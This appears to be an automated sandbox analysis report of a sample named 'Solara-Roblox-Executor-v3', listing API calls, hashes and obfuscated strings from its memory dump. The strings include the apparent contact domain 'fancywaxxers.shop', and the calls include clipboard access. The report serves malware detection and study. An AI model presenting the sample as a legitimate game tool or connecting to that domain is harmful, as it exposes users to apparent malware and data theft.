                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 039a965a5e932348f0846b263a11a7da3d88cac10f9e3f4e98b20a01168dd203
                                                                                          • Instruction ID: ed897db68d2f824ce5d4c6ea69fbebf55ae07169fcb8736336b4f2104763bcd3
                                                                                          • Opcode Fuzzy Hash: 039a965a5e932348f0846b263a11a7da3d88cac10f9e3f4e98b20a01168dd203
                                                                                          • Instruction Fuzzy Hash: 79F0A77A55C210ABD2045F25BC06A1B37A8DF8F710F011839E405A2156D739F81286AE
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: aa80bd4a295446294ac11a8a10524a2e6beea580fe1d5e111643b3ff0549dc68
                                                                                          • Instruction ID: 4ace6a5d690975b11af3c4666b26e1e77f09e9929f410ab7eb8611b0893769a0
                                                                                          • Opcode Fuzzy Hash: aa80bd4a295446294ac11a8a10524a2e6beea580fe1d5e111643b3ff0549dc68
                                                                                          • Instruction Fuzzy Hash: 25F0D0B49047018FD344DF14D56571BBBE1EB85304F10C82DE4958B350DB7A9548CF82
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: d0d7fe7544170d5ae8f9228bf6cfad8d882ca38c8cdb98503c4a93d1490b5fb7
                                                                                          • Instruction ID: 985d7c46c4c91835716fd23372d47f8b671b66ea7a8bf13cfef953cc70728e13
                                                                                          • Opcode Fuzzy Hash: d0d7fe7544170d5ae8f9228bf6cfad8d882ca38c8cdb98503c4a93d1490b5fb7
                                                                                          • Instruction Fuzzy Hash: 97F0A4B46083428FE310DF25D56974BBBE1BBC5308F15891CE0944B390C7B9A9498B82
                                                                                          APIs
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C663
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: e5cd34cbafc55f1e7eddfbd2313b39ad9063b4238026ba4bb9fbe934c854d4e3
                                                                                          • Instruction ID: 069f7b1c6f19c039f18f438670f1ef35198aa9731d00d4267406a3f8b0e2fb98
                                                                                          • Opcode Fuzzy Hash: e5cd34cbafc55f1e7eddfbd2313b39ad9063b4238026ba4bb9fbe934c854d4e3
                                                                                          • Instruction Fuzzy Hash: B3D0A7355545487FD204BB1CDC47F16361CD787B55F500235B2A3D66D2D9107A14C569
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C695
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID:
                                                                                          • API String ID: 640775948-0
                                                                                          • Opcode ID: 440e95b38ebb1a844790dba98f5f82c4b8900d51c08e1cc0e09fc6c1cb957324
                                                                                          • Instruction ID: b43cd1d53a2aed40e5e2bc9aaae7e1c6e016ab282fe32541eb982d374b7614db
                                                                                          • Opcode Fuzzy Hash: 440e95b38ebb1a844790dba98f5f82c4b8900d51c08e1cc0e09fc6c1cb957324
                                                                                          • Instruction Fuzzy Hash: 9ED0C9787D43817AF274AB18EC63F1032109702F22F340629B362FE6E1CAD0B301860C
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0043CE49
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: 69f1cfd33be66feae47a3d15702f4a44d718e84a6ec68eb824ba433d2b08b24d
                                                                                          • Instruction ID: d36a51164de634362bc0c348a54f1afaed1d160a280bd37972b66b24d3067254
                                                                                          • Opcode Fuzzy Hash: 69f1cfd33be66feae47a3d15702f4a44d718e84a6ec68eb824ba433d2b08b24d
                                                                                          • Instruction Fuzzy Hash: D7E017FCA14200AFD604DF2AFC564293768E70E38A7141C39E203E3362EA35A516CF1A
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,078F0570,0040AD69,?), ref: 0043A930
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: aa77b153df83aa0648d4e5ef14955a0dee6a28c9eb21a15ecce94dcc0288dfb2
                                                                                          • Instruction ID: 1bec28ab9f426d7cf4e5273d770ae0e455ce1304f948499519ea945e8e9a7362
                                                                                          • Opcode Fuzzy Hash: aa77b153df83aa0648d4e5ef14955a0dee6a28c9eb21a15ecce94dcc0288dfb2
                                                                                          • Instruction Fuzzy Hash: 50D0C936409126FBC6106F18BC05BCB3A54EF49321F0718A1F440AA065D764EC92CAD8
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A8E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 618dd1765a81cefc2703dc6892598b615660d8e824fcd20375fc210db13e00eb
                                                                                          • Instruction ID: 3f4af44d4470a0fbe172d2908791aabd4b850efe916076a1a4cc36af0c283a21
                                                                                          • Opcode Fuzzy Hash: 618dd1765a81cefc2703dc6892598b615660d8e824fcd20375fc210db13e00eb
                                                                                          • Instruction Fuzzy Hash: 3DB09238588200AFD2188F00DC18F757B39AB0B352F202024A0496B9B29720D841CA4C
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00423E87
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: )`+f$*|:b$,x"~$,K$6\1B$7d1j$:h>n$;D6J$<P-V$<z1x$?~1|$?9$As$G8h>$KM$LM$P4P:$Q2z0$T3$Y0X6$du$j<o"$s ]&$y~$EG$IK$IK
                                                                                          • API String ID: 237503144-176486204
                                                                                          • Opcode ID: 4ea41a74095953a6bb104565ec8e8e82e4ba0b91258274c99b903924837fbaf0
                                                                                          • Instruction ID: 52e58aca3063a9a47ea7f5c312e0c4d4e6097df5b0b40be0427110893b3f2291
                                                                                          • Opcode Fuzzy Hash: 4ea41a74095953a6bb104565ec8e8e82e4ba0b91258274c99b903924837fbaf0
                                                                                          • Instruction Fuzzy Hash: C09285B560C3808BD734CF64D841BABBBF1FB85304F40892DE5D99B252D7B58906CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )`+f$*|:b$,x"~$6\1B$7d1j$:h>n$;D6J$<P-V$<z1x$?~1|$?9$G8h>$KM$LM$P4P:$Q2z0$T3$Y0X6$j<o"$s ]&$EG$IK$IK
                                                                                          • API String ID: 0-1817150213
                                                                                          • Opcode ID: f107c8039fb28611d21461d02613db359083f692f33b9db2ad77000e318ed1ca
                                                                                          • Instruction ID: 729a02ce9405a37de42b7df271b0d41c1cfd89f57b3d10eb943a613648fac085
                                                                                          • Opcode Fuzzy Hash: f107c8039fb28611d21461d02613db359083f692f33b9db2ad77000e318ed1ca
                                                                                          • Instruction Fuzzy Hash: D99273B560C7818BD734CF64D842B9BBBF1FB82304F40882EE5D99B242D77585068B97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )`+f$*|:b$,x"~$6\1B$7d1j$:h>n$;D6J$<P-V$<z1x$?~1|$?9$G8h>$KM$LM$P4P:$Q2z0$T3$Y0X6$j<o"$s ]&$EG$IK$IK
                                                                                          • API String ID: 0-1817150213
                                                                                          • Opcode ID: 6cd765818cc6bfd8133304f011d9cc142fa429ab1a8a1dff29106b8c59bacd27
                                                                                          • Instruction ID: e0c27a7199b10ba4e9966607cc2369be5114a7ee68ebb573e7d484185c4e1b46
                                                                                          • Opcode Fuzzy Hash: 6cd765818cc6bfd8133304f011d9cc142fa429ab1a8a1dff29106b8c59bacd27
                                                                                          • Instruction Fuzzy Hash: 298272B560C7818BD734CF24D842B9BBBF1FB82304F408D2DE5D9AB252D6758546CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &A-C$5Q<S$6E+G$7U9W$8]S_$<Y?[$>M"O$@R_L$@^_T$E-A/$I)^+$M%E'$O9M;$P!N#$WHwd$eI?K$fancywaxxers.shop$jabc
                                                                                          • API String ID: 0-3167547214
                                                                                          • Opcode ID: 79b69f35623f4b1030c7d79dd592a2d87726d3e28b20378e26cdaad2eeeae4be
                                                                                          • Instruction ID: 0a0402f88f36a4f345282987371d5ce03231b73cb0afbcd0892d2d12bc10a949
                                                                                          • Opcode Fuzzy Hash: 79b69f35623f4b1030c7d79dd592a2d87726d3e28b20378e26cdaad2eeeae4be
                                                                                          • Instruction Fuzzy Hash: EE81EFB594D3D08AC331CF6194987EBBFE1ABE6701F188A6DC4C96B352D7380505CB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &A-C$5Q<S$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$eI?K$fancywaxxers.shop$jabc$p
                                                                                          • API String ID: 0-452036927
                                                                                          • Opcode ID: b8eb50bd7fd2800a6558e4d1ac56e47488d5981e48669be42c7d8a9b278f0bec
                                                                                          • Instruction ID: f6942c945ab490a1a029ac6160cd29665c225949e07297181d48f6d0b3406f3c
                                                                                          • Opcode Fuzzy Hash: b8eb50bd7fd2800a6558e4d1ac56e47488d5981e48669be42c7d8a9b278f0bec
                                                                                          • Instruction Fuzzy Hash: 41D189B4A04755ABDB24CF65DD813BEBBB0FF56300F5841AEC441AB782D7788942CB98
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: s$2uB$AwzM$KtB$RyAt$V_Q\$ltB$rwIy
                                                                                          • API String ID: 0-3982219918
                                                                                          • Opcode ID: 04cf2488d4bc7c23fb7954dd9db05926e0d35dada1e1450b27b3acc842a5f796
                                                                                          • Instruction ID: 1bf6d5eb903e3478407aa4a2de14c7a371cc740c8e783bea0656398b78c4a1e5
                                                                                          • Opcode Fuzzy Hash: 04cf2488d4bc7c23fb7954dd9db05926e0d35dada1e1450b27b3acc842a5f796
                                                                                          • Instruction Fuzzy Hash: 1D22F1B160C3459FC724DF29D89176BB7E2FBC5314F48892DE4898B392DB389905CB86
                                                                                          APIs
                                                                                            • Part of subcall function 0043C6B0: LdrInitializeThunk.NTDLL(0043FA9D,?,00000018,?,?,00000018,?,?,?), ref: 0043C6DE
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A7BA
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A86B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                          • String ID: \]$wu$AC
                                                                                          • API String ID: 764372645-2495816402
                                                                                          • Opcode ID: beb79ec4ec5c1b30008b46b94c0092cfda98b8f3f77dbb616830ec245ae85eda
                                                                                          • Instruction ID: b7af8e654c9e5ad4156cae4c9b92cad71f5d0f1b95b6ad258964b00ca882822e
                                                                                          • Opcode Fuzzy Hash: beb79ec4ec5c1b30008b46b94c0092cfda98b8f3f77dbb616830ec245ae85eda
                                                                                          • Instruction Fuzzy Hash: DCA257767083015BE3248F29CC857AFBBD2EBC5314F19893EE4D487392E77898958786
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1494355150-0
                                                                                          • Opcode ID: b14e6c6b015cf6f36e01bcf364146bf2efebe57500bb90dfd55a693b53ac9613
                                                                                          • Instruction ID: ff6b635dae625c362d26e4ac503e69b89fde9966024dcd649795668d665db029
                                                                                          • Opcode Fuzzy Hash: b14e6c6b015cf6f36e01bcf364146bf2efebe57500bb90dfd55a693b53ac9613
                                                                                          • Instruction Fuzzy Hash: EC4191B150C7828ED300AF7C994936FBFE0AB96324F054A6EF4D5863D1D63886898757
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004291E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: "#`$"#`
                                                                                          • API String ID: 237503144-2918922839
                                                                                          • Opcode ID: 3560c99ad8369be48d29543379f91eacd884e09f4646e343d12764f8cd26e683
                                                                                          • Instruction ID: bb1af0155e8c97e772b3ade1192a0bbdeee5ee209ff73428faf885dc7862e06e
                                                                                          • Opcode Fuzzy Hash: 3560c99ad8369be48d29543379f91eacd884e09f4646e343d12764f8cd26e683
                                                                                          • Instruction Fuzzy Hash: FCA1057225C3668FD718CF68988179FB7E1EBC5304F01883DE995DB281D674D80A87C2
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: (%$VTHU$i` [${PY_
                                                                                          • API String ID: 3664257935-4244161340
                                                                                          • Opcode ID: 25cdf1e8e4acfa0086cdd96e89cdf7886e21c574233df5217ac2fd4079109afe
                                                                                          • Instruction ID: 21d45a69875112c23b4c5be9adeda8192fb16588a1cfefe4b9d9260d7bd5bea9
                                                                                          • Opcode Fuzzy Hash: 25cdf1e8e4acfa0086cdd96e89cdf7886e21c574233df5217ac2fd4079109afe
                                                                                          • Instruction Fuzzy Hash: D14126706083928BD3268F259CA4BAFBFA0EF93310F24495DE4D65B392D738440587AB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8h/n$:G!A$Vw1q$_\$fg${u
                                                                                          • API String ID: 0-571651433
                                                                                          • Opcode ID: 3e64fb3b6bbcadac1e68f2cfb04d1c419dd19bd9cddeb80b9f54e814e34da8e2
                                                                                          • Instruction ID: 4d587711fa9bf315219b08e5eacbfd1868b7a59e3a746aa50b59dccfd34602ab
                                                                                          • Opcode Fuzzy Hash: 3e64fb3b6bbcadac1e68f2cfb04d1c419dd19bd9cddeb80b9f54e814e34da8e2
                                                                                          • Instruction Fuzzy Hash: AC124476A4C3008BD714CF69D88266BBBE2EFD6304F08882DF4C58B351E7398945CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,13-$4$H?6;$UW(U$Ur
                                                                                          • API String ID: 0-623118844
                                                                                          • Opcode ID: 0c0ea0f48cde75f1d76b868ba7f85f9ce3d48430434990ea6297f14b2cd37fbe
                                                                                          • Instruction ID: 7317f9598c7517db43dbe8c3128e74df408d1825271b4f98ac102b84f177ffd6
                                                                                          • Opcode Fuzzy Hash: 0c0ea0f48cde75f1d76b868ba7f85f9ce3d48430434990ea6297f14b2cd37fbe
                                                                                          • Instruction Fuzzy Hash: DE426B7550C3918BC721CF2688407AFBBE1AFD6310F184A6EECE5473D2E6358845CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$N/})$rs
                                                                                          • API String ID: 0-3451683530
                                                                                          • Opcode ID: 8484fa28704cc6668a4851017a5de8ee74215d17a58d8bcb956ac78f233524bb
                                                                                          • Instruction ID: 074e1bf9f06243e5a214ac73fc47715d135f02f936c9b1432630660c01d6db87
                                                                                          • Opcode Fuzzy Hash: 8484fa28704cc6668a4851017a5de8ee74215d17a58d8bcb956ac78f233524bb
                                                                                          • Instruction Fuzzy Hash: EE128AB41083818BD324CF25C4A17ABBBF1EFD1319F198A5DD4C99B391E778844ACB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "nB$IRSG$MJHD
                                                                                          • API String ID: 0-3654733057
                                                                                          • Opcode ID: d0727302d58e24938a0dee450b46ea026822f247fac10a7e0a0defa56bd75230
                                                                                          • Instruction ID: bef73ba0cce5b457ce1c899b5e22c80b463801814e86bfb7c3c5eca358ae516b
                                                                                          • Opcode Fuzzy Hash: d0727302d58e24938a0dee450b46ea026822f247fac10a7e0a0defa56bd75230
                                                                                          • Instruction Fuzzy Hash: B00210B560C3918FD7108F25D88166BBBE2AFD6314F15882EE4C59B352DB78D806CB46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 23$n;c5$u7k1
                                                                                          • API String ID: 0-1212525841
                                                                                          • Opcode ID: b04af375faed367ad06554eb19e030d3a8654fd572cf190bbc501d115a635120
                                                                                          • Instruction ID: d503fa6d027ef4ecace00d86ef68f704507f2347e615acfd5cb0330a872e39a3
                                                                                          • Opcode Fuzzy Hash: b04af375faed367ad06554eb19e030d3a8654fd572cf190bbc501d115a635120
                                                                                          • Instruction Fuzzy Hash: 9FC17972B042206BD714DB24EC5367BB3E1EF81324F49952EEC8697391E67CD905C3AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1.$?F?E$QF?E
                                                                                          • API String ID: 0-340704800
                                                                                          • Opcode ID: 9bc6299e8139cda84109b6c7b3e53d2c1f196f73f2354e7d581e60c09bc30936
                                                                                          • Instruction ID: f4cdcd463673ede1faf1fcca30bdd9374db74c51598836d24eeffaead2554c88
                                                                                          • Opcode Fuzzy Hash: 9bc6299e8139cda84109b6c7b3e53d2c1f196f73f2354e7d581e60c09bc30936
                                                                                          • Instruction Fuzzy Hash: CBC131B06183108BD724CF25D89276BBBF1FF92354F448A1DE4C28B3A1E7789801CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$N/})$rs
                                                                                          • API String ID: 0-3451683530
                                                                                          • Opcode ID: 581cc1515653bfb34a6bddbbe29ddc4bf41ad911e0114918d0ba5e39550539e6
                                                                                          • Instruction ID: 11e7c06764aa7a11193eb6d0d5c473ff25016c8d05d03320204534f07612e30d
                                                                                          • Opcode Fuzzy Hash: 581cc1515653bfb34a6bddbbe29ddc4bf41ad911e0114918d0ba5e39550539e6
                                                                                          • Instruction Fuzzy Hash: E0A17BB41183818BD3308F25C4517ABBBF1EFC2319F158A5EE4C99B350E7798846CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <BPm$<BPm$@[YY
                                                                                          • API String ID: 0-4004820647
                                                                                          • Opcode ID: c435bf647f37dadb9d421b84b1cf70e8aa0082771fdcacca727cb10a987324ed
                                                                                          • Instruction ID: 4cc00e460a4ad2b70a6d5be8106dfe473e3c2fa048093029565a12a76f4a1047
                                                                                          • Opcode Fuzzy Hash: c435bf647f37dadb9d421b84b1cf70e8aa0082771fdcacca727cb10a987324ed
                                                                                          • Instruction Fuzzy Hash: FA514C7160C3E18ACB398F3990D03BBBBD2AFE7205F5845ADC4D99B382C63840068B56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <BPm$<BPm$@[YY
                                                                                          • API String ID: 0-4004820647
                                                                                          • Opcode ID: 4e4ec283cf2b06837c1c5385cda95729b63fc27ff3c9d6a601c6414bbe66a819
                                                                                          • Instruction ID: 7a658c6c4bd32708723c2d168bb25c792060f5c9bfbc8c0d13b25a40fca020c0
                                                                                          • Opcode Fuzzy Hash: 4e4ec283cf2b06837c1c5385cda95729b63fc27ff3c9d6a601c6414bbe66a819
                                                                                          • Instruction Fuzzy Hash: E1511C7160C3D18ADB398F3990E43BBBBD29FE3305F6855ADC4D69B382D63940068B56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: IU$Q^$~|
                                                                                          • API String ID: 0-1088907063
                                                                                          • Opcode ID: 71630cd5531b9ef4dec250e8d57c94be989761556b92c27b1ac97d01023745c7
                                                                                          • Instruction ID: 6df6e0cfba5c95a8eff5d94cf930419a97e0658a5cfe043863ebd062064c7be7
                                                                                          • Opcode Fuzzy Hash: 71630cd5531b9ef4dec250e8d57c94be989761556b92c27b1ac97d01023745c7
                                                                                          • Instruction Fuzzy Hash: 997153B160D3828BE3358F26C5913EBBBF1EBD6304F04892DD8C84B341DB7895468B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <BPm$<BPm$@[YY
                                                                                          • API String ID: 0-4004820647
                                                                                          • Opcode ID: 934050c5b0141aaebcf3420aa3f0bdf4bd5c8bb68b0f199e38c47e6b315c551a
                                                                                          • Instruction ID: 57b283e37f3154f442c2f626274166c32a91ca54069e14450e9584fe66ae8e3e
                                                                                          • Opcode Fuzzy Hash: 934050c5b0141aaebcf3420aa3f0bdf4bd5c8bb68b0f199e38c47e6b315c551a
                                                                                          • Instruction Fuzzy Hash: 9441FA7161C3E18ACB398F3990D43BBBBE16FA7205F5845AEC4D59B382C73940068B56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
